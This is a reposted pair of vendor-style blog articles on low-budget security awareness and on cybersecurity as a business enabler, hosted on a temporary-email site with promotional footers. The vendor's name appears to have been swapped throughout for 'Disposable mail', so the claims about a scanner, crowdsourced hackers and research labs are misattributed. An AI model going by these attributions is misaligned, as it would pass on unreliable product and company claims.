8 ways to create better cybersecurity awareness with a limited budget – 10 minute mail

Not all cybersecurity budgets are made equal, and for some that means having too many or too few tools. For others this means having few employees or being the lone ranger responsible for better security awareness in the company. Here are options that fit every budget:

Cybersecurity on a budget

Invest in VPN to protect your peers and staff

This seems like a no-brainer but VPNs should be standard for all organizations, especially with the normalization of cloud computing and remote work from all employees. While not every WiFi hotspot can be trusted, one cannot expect employees to stop all work due to an insecure connection. But how can you demonstrate value to your board or management? Try setting up a “trustworthy” WiFi pineapple at your next company party for a live demo of Man In The Middle. Yes, MITM is still possible today even with HTTPS.

Assess assets with an Incident Response Plan

If a hacker were to be detected in your systems this moment, what would your next step be? Having an incident response plan in place, communicated and rehearsed would hopefully have you calm and collected knowing what action to take with systems backed up. Applying that mindset that someone is already accessing your systems and being prepared in how to respond is the best way to stay on top of threats.

With this in your toolbox, you will be able to show stakeholders what information could be compromised should a hacker get into “X” or “Y”. Best of all, it doesn’t require external resources to execute, and if you don’t know where to start, here’s our guide on how to build an Incident Response Plan.

Implement a responsibility disclosure program

There’s a lot of talk about bug bounty programs and leveraging ethical hacker knowledge but having a full program in place comes with a price tag and demand for human resources to fix complicated issues that skilled bug bounty hunters will find. Without being able to show the value or ROI, how can you get the budget needed?

We recommend starting with a responsible disclosure program on your site. This option invites ethical hackers to report vulnerability issues without concern for legal repercussions and they do it out of goodwill. With knowledgeable staff, this can be set up without external resources and you’ll receive feedback via vulnerability reports from ethical hackers. This could also help make an informed case for future improvements such as a bug bounty programs, more frequent pentesting or implementing an automated solution. Need inspiration? Disposable mail has a publicly available responsible disclosure policy in place.

Disposable mail Website Security Check Computer

Threat modelling before it happens

Threat modelling is often done by security teams and with the rise of DevOps, it’s being incorporated into developer workflows as well. With this tool, teams look at assets, threats and vulnerabilities in the software. This answer what exactly needs to be protected, what are the external/internal threats to protect against as well as what vulnerabilities exists that need to be fixed. This tool can also be used by non-security team members to get them in the mindset of continuous improvements and protection of assets.

Automated web vulnerability scanning

In 2018, our Disposable mail Crowdsource white hat hackers submitted almost 450 new vulnerabilities to better the breadth of our web vulnerability scanner. From Crowdsourced modules alone, we had 50,000+ vulnerability findings in our clients’ assets scanned. You can imagine all the JIRA tickets that had to be issued and handled, and it was a helpful way for the security manager to get an overview of the security status of web applications. The vulnerability reports summarize what could be exploited by a hacker and then managers can prioritize remediations accordingly in workflows.

Using an automated web vulnerability scanner can save you time from detecting known vulnerabilities and allows your security team more time to dig deeper for issues that require more creativity and cannot be automated. A modest investment for a web application scanner is relatively less costly than a multi-million or billion user breach such as we saw in 2018.

Results from automated scanning to show the security status of your web applications and can be compared with the results of annual security audits and penetration testers to get more value out of the latter.

Security training as part of employee on-boarding

One way to scale up security awareness in an organization is to include it in the on-boarding process and educate employees outside of the core security team. For some that could mean everyone besides the CISO. However, there’s a growing trend for developers and designers to care about application security (in fact that’s how Disposable mail got started!) and supporting them on this journey is valuable. Here are some ways to make security skills accessible:

  • Host internal knowledge sessions and providing a working environment where developers can hack their own code
  • Build up security champions
  • Employee-led sessions on how to hack or learn about information security
  • Eliminate the blame-game when a security issue occurs and enable ownership of writing secure code
  • Run Capture-the-flag (CTF) events for participants to practice offensive and defensive coding skills

Developers aren’t the only ones who need training. Be sure to include training people of all levels from interns to C-level on the real-life implications of phishing, password management and social engineering.

Sharing knowledge is caring for colleagues

Even a security company needs to encourage better security practices for awareness from staff but not everyone has time for 1-to-1 sessions to communicate it all. At Disposable mail, we’ve been able to scale up security knowledge sharing by creating explanatory video on OWASP Top 10 and other known vulnerability on the Disposable mail Youtube channel for colleagues and anyone else security-interested. We also have internal lightning talks on our security test updates, hack demos and weekly security tips from our security researchers to encourage everyone to think security-first.

Start an internal RSS feed or channels for security news and interesting write-ups

With the rise of digital workplaces like Facebook Workplace and Slack, it’s even easy today to share interesting articles and learning resources. To build up a security mindset in the workplace, you could set up RSS feeds to automate news from your trusted security channels like the popular Reddit community /r/netsec or get immediate notifications when research articles from Disposable mail Labs are published (you know we had to mention that!).

Final thoughts

Building up security awareness or a security culture is not a cut-and-paste job, and with some of the mentioned tools and internal learning resources, adoption may be easier. There are things one should pay for like VPN or an online vulnerability scanner to help with the tedious and easily preventable matters, while there are ways to be resourceful when creating cybersecurity awareness. Lastly, all levels of organization should be aware of security risks and planning as if someone is already in.

Curious to see how Disposable mail automated web vulnerability scanner can make security easier for you? Get started today with a free trial and check your web applications for 1000+ known vulnerabilities today.


Author:
Jocelyn Chan

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.

Cybersecurity from an overhead cost to a business enabler – 10 minute mail

Implementing cybersecurity projects shouldn’t only depend on return on investment or viewed as a cost. There’s a better way you could be evaluating it. Businesses should be thinking about how adding cybersecurity can add more business value and enable company growth. The landscape is changing and security is starting to be seen as a competitive advantage more often, and for some industries, it’s a reason customers want to do business with a brand. We discuss 5 ways cybersecurity can be a business enabler:

CyberSecurity-As-Business-Enabler-White

Gain a competitive edge with cybersecurity and acquire bigger accounts.

If your company is a supplier, having a good understanding of the security status of your applications is crucial. It’s 2019, and it’s imperative to be knowledgeable of your own security status as no one wants to be the weak link in the supply chain.

If you are using an automated web app scanner like Disposable mail, you can get detailed reports on the security status of your products and continuously monitor your web applications. This gives customers a piece of mind knowing that security is part of your company culture to keep the proverbial doors shut from your end of the supply chain. You may even gain a competitive edge as it could make your offering seem less risky for the buyer and expedite the procurement process, especially from enterprises that likely have infosecurity requirements.

Some companies require vendors to complete security questionnaires as part of the process. Knowing your answers in details will streamline the acquisition process. Here’s some insight from Paul Langley, Information Security Manager at Loopio, an RFP response software provider:

“If you are in the B2B space and you want to win big enterprise deals, you need to provide some sort of assurance of your security practises. Prospects and customers want to know that the data they are trusting you with will be secure, along with meeting specific legal, regulatory and compliance requirements they may have.

Your responses to security questionnaires should provide maximum value and answer questions in as much detail as possible, saving time from follow-up questions and further evidence requests. A simple ‘yes’ or ‘no’ will not always be sufficient. Having a standard approach to security questionnaires can also buy time before your company needs to perform a third party security audit or certification (SOC 2, ISO 27001, CSA, etc.).”

Know your third-party applications and their security status. 

Adding third-party applications are commonly used to facilitate better understanding of customers, website interactions and automating some processes like customer service chatbots on a landing page. Doing so will help you understand customer behaviour better and scale up business activities, adding more customers into the figurative funnel, but can this backfire?

59% of respondents in the 2018 Ponenom Institute annual survey experienced a data breach from third-parties, while 22% of respondents admitted that they were not sure at all whether a data breach happened or not. These numbers start to make sense as headlines in 2018 included Magecart and malicious third-party javascript that compromised large company web applications including British Airways and Ticketmaster.

While your main application may be secure, cybercriminals are now gaining access into companies via third-party suppliers and finding the backdoors in. Third-party applications may be key to scale up operations, but be sure to do the due diligence on their security status and monitor the data that’s transferred to avoid being an embarrassing headline.

Develop faster. Stay Agile AND secure.

Historically, security is seen as a compliance unit, a cost center, but there’s a way to turn the dialogue around. Turning security into a business enabler is a hot topic now, and it begins with shifting paradigms to communicate what the added business value of cybersecurity is. For many B2C companies, this means connecting with intrinsic customer needs like personal security. Training developers to also consider the security needs of the customer could mean added value into applications, better user experience, and fewer fires to put out. Having cybersecurity shouldn’t stop a company from scaling, but rather scale together with development. This can be achieved by automating some of the security processes like code scanning, testing, while security teams work closely with developers to design with security in mind during the CI/CD development cycle.

Even if you don’t have a security manager, developers can still be equipped with automated tools like Disposable mail, use threat modeling and partake in internal training on common vulnerabilities like OWASP Top 10. While they can seem trivial to some, even a common vulnerability like XSS or misconfigured S3 buckets can lead to customer information or company user details to be leaked and misused in other ways. With the right checks in place, security can suddenly become a value-added for smooth customer experiences, fewer bug fixes and scaled up development.

Flaunt your cybersecurity as a USP to win end-users.

The banking sector has been using cybersecurity as a way to leverage their businesses and win customers over. Things like money sit close to personal privacy, and the marketplace has many other new products and companies entering this area such as IoT. There’s a concern that risk is being introduced into private homes, workplaces, and during commutes. This also opens up an opportunity for businesses in these sensitive markets to start leveraging product security as a competitive advantage.

Besides these personal possessions, the safety of children’s personal information in web or mobile apps is also vulnerable, which is something Pokemon GO recognized and turned into business value. They were able to leverage the security of the game to reassure parents that the game was safe for children to play, and still earned $795 million in 2018, which was a 35% growth in the last year.

Cybersecurity transparency for retention.

While GDPR compliance requires customer data is stored safely, and it requires companies to notify individuals whose information may be compromised within 72 hours. WIthout the right communication, customers may begin to think there’s more to the story and there’s something to hide. This could backfire and lose your valued customers and even land you a hefty fine, or a PR headache. Should a data breach occur, there’s an opportunity for businesses to respond with transparency, diligence, and urgency to show whether your brand is customer-centric and concerned for data protection.

How does Disposable mail help?

Start with securing all your web applications where there’s a possibility for user interaction. Automating this process with a web application scanner and domain monitoring service like Disposable mail can get you started on this path. Besides the common vulnerabilities like OWASP Top 10, you can also test for more creative exploitations submitted by the Disposable mail Crowdsource white hat hackers. Once you begin with a more fluid and structured way of working with web security and connecting it to business values, it can scale together with the business and enable faster and better growth.

Have you included an automated DAST-solution as part of your cybersecurity strategy today? If not, it’s easy to get started with Disposable mail automated web application scanner by signing up for a free 14-day trial. No credit card is required, and you’ll be up and scanning within minutes.

 

Temp Mails (https://tempemail.co/) is a new free temporary email addresses service. This service provide you random 10 minutes emails addresses. It is also known by names like: temporary mail, disposable mail, throwaway email, one time mail, anonymous email address… All emails received by Tempmail servers are displayed automatically in your online browser inbox.